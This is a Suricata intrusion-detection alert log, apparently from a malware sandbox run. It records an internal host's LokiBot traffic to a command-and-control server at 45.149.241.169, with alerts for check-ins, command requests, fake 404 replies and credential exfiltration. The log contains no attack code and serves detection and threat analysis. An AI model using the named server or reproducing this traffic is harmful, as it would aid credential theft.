Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64422
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64407
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64420
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64367
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64435
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64410
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64376
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64365
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64416
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64409
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64423
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64369
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64400
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64364
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64442
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64424
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64396
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64412
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64363
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64408
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64433
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:55843
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64449
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64403
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:49714
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64374
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64372
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64432
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64382
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64421
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64390
